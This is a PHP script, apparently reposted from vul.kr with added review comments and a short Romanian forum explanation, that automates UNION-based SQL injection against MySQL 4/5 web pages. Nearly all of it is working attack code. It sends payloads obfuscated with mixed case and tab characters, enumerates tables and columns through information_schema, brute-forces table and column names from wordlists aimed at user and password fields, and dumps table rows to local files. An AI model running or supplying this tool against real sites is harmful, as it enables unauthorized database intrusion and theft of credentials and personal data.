
Mysql 4/5 database Auto-injection



<?php
//author:www.vul.kr
// NOTE(review): this script actively sends UNION-based SQL injection payloads to
// the URL it is given and pulls schema and row data out of the responses. Run it
// only against systems you are explicitly authorized to test.

// Runtime setup: silence PHP notices/warnings, lift the execution time limit
// (a full run can take hundreds of requests) and cap each socket wait at 10 s.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);

// Positional CLI arguments. $database is only meaningful for the modes that
// take a database name (2, 3, 4); modes 5 and 6 read their own argument layout
// from $argv later and re-validate $argc themselves.
$server=$argv[1];
$mode=$argv[2];
$database=$argv[3];

// Drop any literal double quotes the shell may have left around the URL.
$server=str_replace("\"","",$server);
// Unused at file level; str_todex() keeps its own local $num.
$num=0;

// Missing target URL or mode: print the usage banner and stop.
if (!$server || !$mode) {
    $usage = '
--------------------------Begin Code By www.vul.kr------------------------------
Usage:
php.exe '.$argv[0].' Url Options Database Table
Options:
1 Show Union Number [MYSQL 4/5 VERSION]
2 Show Tables [MYSQL 5 VERSION]
3 Show Columns [MYSQL 5 VERSION]
4 Show Content [MYSQL 4/5 VERSION]
5 Guess Tables [MYSQL 4 VERSION]
6 Guess Columns [MYSQL 4 VERSION]
-------------------------------End-----------------------------------------
';
    echo $usage;
    exit;
}
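/**
 * Encode a string as a MySQL hex literal, e.g. "abc" -> "0x616263".
 *
 * The literal is spliced into the injected query (TABLE_SCHEMA=0x..., TABLE_NAME=0x...)
 * so database and table names need no quote characters in the URL.
 *
 * @param string $string raw bytes to encode; an empty string yields "0x"
 * @return string "0x" followed by exactly two lowercase hex digits per input byte
 *
 * Fix: the previous per-byte dechex() loop emitted a single digit for bytes below
 * 0x10 (e.g. "\n" became "0xa"), which misaligns every following nibble and
 * corrupts the literal. bin2hex() always produces two digits per byte.
 */
function str_todex($string){
    return "0x".bin2hex((string)$string);
}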
if($mode==1) {
// Mode 1: find how many columns the injectable SELECT has. Each probe appends
// "and 1=2 UNION SELECT <marker>[,<marker>...]#" to the URL (tabs %09 as
// whitespace, mixed-case keywords, presumably to slip past naive filters) and
// the script treats the marker text showing up in the reply as proof that
// the current column count is right.
$injstr="0x5B676F6F676C656F72675D";  // hex literal for the marker string "[googleorg]"
$ins=$injstr;
for($j=1;$j<=50;$j++){
$expurl=$server."%09and%091=2%09UnIoN%09SeLeCt%09".$injstr."%23";
echo "..";
// Errors are suppressed: a failed fetch (false) is indistinguishable from "marker absent".
$reponse=@file_get_contents($expurl);
if(strstr($reponse,"[googleorg]")){
echo "\r\nFind Colnums Numbers: $j \r\n";break;}
$injstr=$ins.",".$injstr;  // grow the column list by one more marker
}
// NOTE(review): if no reply contained the marker, $j is 51 here and url.txt is
// still written below as if 51 columns had been confirmed.
$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$data=$expurlps;
$aall="";
$dote=",";
for($k=1;$k<=$j;$k++)
{
$aall=$aall.$k.$dote;  // builds "1,2,...,j,"
}
$unum=substr($data.$aall,0,strlen($data.$aall)-1);  // drop the trailing comma
$expurl="%23";
$rurl=$unum.$expurl;
// Persist the working "... UNION SELECT 1,...,j#" URL for manual follow-up.
// NOTE(review): the handle is never fclose()d; PHP releases it at exit.
$fp=fopen("url.txt","w");
fwrite($fp,$rurl);
//echo "\r\n$rurl";
echo "\r\n go and see url.txt";
}

elseif($mode==2){
// Mode 2 (MySQL 5 only): list the tables of $database through information_schema.
// Arguments: url 2 database <union-column-count> <position-of-a-column-echoed-in-the-page>.
if($argc<>6) {echo "\r\ninjection-url option database Union-NO Union-postion\r\n";exit;}
//-----------------------------get the NO of tables------------------------------------------------------------
$expurl0=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
// Column placeholders are 501..(500+N). Presumably the 500 offset keeps every
// placeholder a distinct 3-digit token so the str_replace() below touches only
// the chosen position (and not, say, the "1" inside "1=2").
$UnIoNnum=$argv[4]+500;
$data=$expurl0;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
// CONCAT("[googleorg]", count(*), "[/googleorg]") so the number can be cut out of the HTML.
$replacetext="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";
// $expurl1 is appended to without being initialised; harmless under error_reporting(0).
$expurl1.="%09FrOm%09information_schema.tables%09";$expurl1.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%23";
$rurl=$unum.$expurl1;
$search=$argv[5]+500;  // placeholder of the column whose value is visible in the page
$endurl=str_replace($search,$replacetext,$rurl);
//---------------------------------------------------------------------------------------------
$reponse1=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse1,$matchs1);
// First capture is the table count. If nothing matched, $Tnum stays unset and
// the loop below runs zero times, with no message.
if($crack1=($matchs1[1])){$Tnum=$crack1[0];echo "\r\nFind $Tnum tables\r\n";}
for($i=0;$i<$Tnum;$i++){
echo "\r\n";
//-----------------------------Get tables-----------------------------------------------------------
// Same query shape as above, but selecting TABLE_NAME ... LIMIT i,1: one table name per request.
$expurfirst=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$data=$expurfirst;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=substr($data.$aall,0,strlen($data.$aall)-1);
$replacetxt="CoNcAt(0x5B676F6F676C656F72675D,TABLE_NAME,0x5B2F676F6F676C656F72675D)";
$expurl="%09FrOm%09information_schema.tables%09";$expurl.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%09limit%09$i,1%23";
$rurl=$unum.$expurl;
$endurl=str_replace($search,$replacetxt,$rurl);
//------------------------------------------------------------------------------------------------
$reponse=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);
// Append each recovered name to table.txt (reopened per iteration, never fclose()d).
if($crack=($matchs[1]))
{$fp=fopen("table.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}
//else{echo "Done!\r\n";break;}
}}

elseif($mode==3){
// Mode 3 (MySQL 5 only): list the columns of one table through information_schema.COLUMNS.
// Arguments: url 3 database <union-column-count> <visible-column-position> tablename.
$table=$argv[6];
if($argc<>7) {echo "\r\ninjection-url option database Union-NO Union-postion tablename\r\n";exit;}
//--------------------------------get count colnums------------------------------------------------------------
$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
// Placeholders 501..(500+N), same scheme as mode 2: 3-digit tokens so the
// str_replace() on the chosen position cannot hit anything else in the URL.
$UnIoNnum=$argv[4]+500;
$data=$expurlexp;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
// CONCAT("[googleorg]", count(*), "[/googleorg]") – the column count wrapped in markers.
$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";
$expurl2="%09FrOm%09information_schema.COLUMNS";
// Both names go in as hex literals (str_todex), so no quotes are needed in the URL.
$expurl2.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%23";
$rurl=$unum.$expurl2;
$search=$argv[5]+500;
$endurl=str_replace($search,$replacetx,$rurl);
//---------------------------------------------------------------------------------------------
$reponse2=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);
// No match leaves $Cnum unset, so the loop below is skipped silently.
if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum Colnums\r\n";}
for($i=0;$i<$Cnum;$i++){

//--------------------------------Get Colnums------------------------------------------------------------
// One COLUMN_NAME per request via LIMIT i,1.
$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$data=$expurlps;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=substr($data.$aall,0,strlen($data.$aall)-1);
$replay="CoNcAt(0x5B676F6F676C656F72675D,COLUMN_NAME,0x5B2F676F6F676C656F72675D)";
$expurl="%09FrOm%09information_schema.COLUMNS";
$expurl.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%09Limit%09$i,1%23";
$rurl=$unum.$expurl;
$search=$argv[5]+500;
$endurl=str_replace($search,$replay,$rurl);
//---------------------------------------------------------------------------------------------
$reponse=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);
// Each recovered column name is appended to column.txt (handle never fclose()d).
if($crack=($matchs[1]))
{$fp=fopen("column.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}
//else{echo "Down!\r\n";break;}
}
}
//-------------------------- Mode 5 (MySQL 4, no information_schema): guess table names ---------------------------
elseif($mode==5) {
// Arguments here are url 5 <union-column-count> <visible-column-position>, so the
// file-level $database (argv[3]) is actually the column count in this mode.
if($argc<>5) {echo "\r\ninjection-url option Union-NO Union-postion \r\n";exit;}
// Candidate table names tried one per request. NOTE(review): the list contains
// duplicates ('users', 'login', 'accounts', 'phpbb_users', 'nuke_users'), each
// of which costs an extra request.
$tmptalble=array(
'users','user','admin','ident','adminlog','members','member','eq_users',
'tb_users','tbl_user','login','logging','nuke_users','admins','group_members',
'phpbb_users','administrator','admin_log','pass_admin','wp_users','accounts','adminlogin',
'auth','authenticate','authentication','account','customers','config','conf','cfg','sb_host_admin',
'WebAdmin','super','administrateurs','webmaster','webmasters','webuser','userinfo','userlist','sysadmins',
'manager','memberlist','logs','login','customer','edit','editor','administration','accounts','cms_admin','cms_admins',
'cms_user','cms_users','xoops_users','vbulletin_user','vb_user','user_login','user_logins','user_admin','tb_member',
'tb_members','tb_administrator','tb_login','tb_user','sysadmin','smf_members','smallnuke_members','site_logins','site_login',
'sitelogin','siteslogins','punbb_users','poll_user','phpBB2.phpbb_users','phpBB2.forum_users','phpbb_users','phorum_user',
'nuke_users','nuke_authors','mybb_users','mysql.user','login_admin','login_admins','login_user','login_users','jos_users',
'jos_joomblog_users','ipb.ibf_members','ibf_members','forum.ibf_members','fusion_users','e107_user','e107.e107_user','dbadmins',
'cpg132_users','chat_users','article_admin','Administratoren','administrieren','4images_users');
$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$UnIoNnum=$argv[3]+500;  // placeholders 501..(500+N), as in the other modes
$data=$expurlexp;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
$replay="0x5B676F6F676C656F72675D";  // marker "[googleorg]" selected as a plain column value
$expurl="%09FrOm%09[chinapost]%23";  // "[chinapost]" is the slot the candidate table name goes into
$rurl=$unum.$expurl;
$search=$argv[4]+500;
$endurl=str_replace($search,$replay,$rurl);
$endurl2=$endurl;  // template kept pristine; each iteration restores it
//---------------------------------------------------------------------------------------------
// A candidate is reported when the marker comes back, i.e. when
// "UNION SELECT ... FROM <candidate>" ran without a "table doesn't exist" error.
for($j=0;$j<count($tmptalble);$j++){
$tb=$tmptalble[$j];
$endurl=str_replace("[chinapost]",$tb,$endurl);
$reponse=@file_get_contents($endurl);
if(strstr($reponse,"[googleorg]")){echo "\r\nFind Table: ".$tmptalble[$j];}
$endurl=$endurl2;}}

//-------------------------- Mode 6 (MySQL 4, no information_schema): guess column names ---------------------------
elseif($mode==6) {
// Arguments: url 6 <union-column-count> <marker-position> <candidate-position> tablename.
if($argc<>7)
{echo "\r\ninjection-url option Union-NO Union-Postion Choose-postion tablename \r\n";exit;}
// Candidate column names tried one per request. NOTE(review): 'userpwd,' carries
// a stray trailing comma inside the quotes, so that entry is sent as "userpwd,"
// and can never match; 'login_user' and 'membername' are duplicated.
$tmpcol=array(
'id','uid','userid','username','cst','user','pseudo','pw','pass','password','uname','login','login_user','memeber_pass','memberpwd',
'login_pass','login_name','userpassword','userpw','userpwd,','member_pwd','memberpw','user_name','name','usr','adminname','admin','adminpass','adminpassword','passwd','adminpasswd','pwd','script','user_login','user_pass','login_passwort','usrname','usrpass',
'usr_pass','userpass','user_password','administrator','usrpw','adminpwd','adminpw','userPassword','Userlogin','Administratorzy',
'Administrator','pWord','passer','Passw','membres','membername','wp_users','usrs','usrnam','usrname','usrn','usernm','useradmin',
'user_usrnm','user_usernm','user_pword','user_pwrd','user_pwd','user_passw','user_email','user_admin','pwrd','pword','psw','passw',
'pass_word','pass_hash','p_word','memlogin','mempassword','members','membername','memberid','member_name','member_id','mem_pwd','mem_password','mem_passwd','mem_pass','mem_login','mail','md5hash','logins','login_username','login_user','login_pwd','auth',
'adminuserid','adminuser','adminemail','admin_userid','admin_user','admin_pwd','admin_password','admin_passwd','admin_pass',
'admin_name','account','accounts','sb_admin_name','sb_pwd');
$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$UnIoNnum=$argv[3]+500;  // placeholders 501..(500+N)
$Gtable=$argv[6];
$data=$expurlexp;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
$replay="0x5B676F6F676C656F72675D";  // marker "[googleorg]" placed in the visible column
// NOTE(review): the table name is inserted raw (not hex-encoded, not URL-encoded).
$expurl="%09FrOm%09".$Gtable."%23";
$rurl=$unum.$expurl;
$search=$argv[4]+500;         // position that carries the marker
$SeLeCtsearch=$argv[5]+500;   // position that carries the candidate column name
$endurl=str_replace($search,$replay,$rurl);
$endurl2=$endurl;  // template with the marker already in place; restored each iteration
//---------------------------------------------------------------------------------------------
// A candidate is reported when the marker comes back, i.e. when
// "UNION SELECT ...,<marker>,...,<candidate>,... FROM table" ran without an unknown-column error.
for($j=0;$j<count($tmpcol);$j++){
$tb=$tmpcol[$j];
$endurl=str_replace($SeLeCtsearch,$tb,$endurl);
$reponse=@file_get_contents($endurl);
if(strstr($reponse,"[googleorg]")){
echo "\r\nFind Column: ".$tmpcol[$j];}
$endurl=$endurl2;}}

elseif($mode==4){
// Mode 4 (MySQL 4/5): dump two columns of a table, one row per request.
// Arguments: url 4 database <union-column-count> <visible-column-position> tablename col1 col2.
$table=$argv[6];
$column=$argv[7];
$column2=$argv[8];
if($argc<>9)
{echo "\r\ninjection-url option database Union-NO Union-postion tablename colnum1 colnum2\r\n";exit;}
//--------------------------------Get contents count-------------------------------------------------------------
$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$UnIoNnum=$argv[4]+500;  // placeholders 501..(500+N), as in the other modes
$data=$expurlexp;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
// CONCAT("[googleorg]", count(*), "[/googleorg]") – row count wrapped in markers.
$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";
// NOTE(review): unlike modes 2/3, database and table names are inserted raw here
// (no str_todex, no URL-encoding), so names with special characters break the request.
$expurl2="%09FrOm%09$database.$table%23";
$rurl=$unum.$expurl2;
$search=$argv[5]+500;
$endurl=str_replace($search,$replacetx,$rurl);
//---------------------------------------------------------------------------------------------
$reponse2=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);
// No match leaves $Cnum unset and the dump loop below is skipped silently.
if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum recodes\r\n";}
for($i=0;$i<$Cnum;$i++){

//--------------------------------Get contents------------------------------------------------------------
$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$data=$expurlps;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=substr($data.$aall,0,strlen($data.$aall)-1);
// CONCAT("[googleorg]", col1, "|", col2, "[/googleorg]"); 0x7C is the "|" separator.
$replay="CoNcAt(0x5B676F6F676C656F72675D,".$column.",0x7C,".$column2.",0x5B2F676F6F676C656F72675D)";
$expurl="%09FrOm%09$database.$table%09Limit%09$i,1%23";  // LIMIT i,1: one row per request
$rurl=$unum.$expurl;
$search=$argv[5]+500;
$endurl=str_replace($search,$replay,$rurl);
//---------------------------------------------------------------------------------------------
$reponse=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);
// Each "col1|col2" row is appended to content.txt (handle never fclose()d).
if($crack=($matchs[1]))
{$fp=fopen("content.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}
//else{echo "done!\r\n";break;}
}
}
?>

http://img.vul.kr/uploads/20090729/1248888141mysql-auto.txt


E un script php care verifica daca este vulnerabila o baza de date.

Le: Xander are dreptate, m-am exprimat gresit. De fapt testeaza daca o pagina care acceseaza o baza de date MySQL 4/5 este vulnerabila la injectie SQL de tip UNION SELECT si, daca este, extrage din raspunsuri numarul de coloane, numele tabelelor, coloanele si continutul lor.

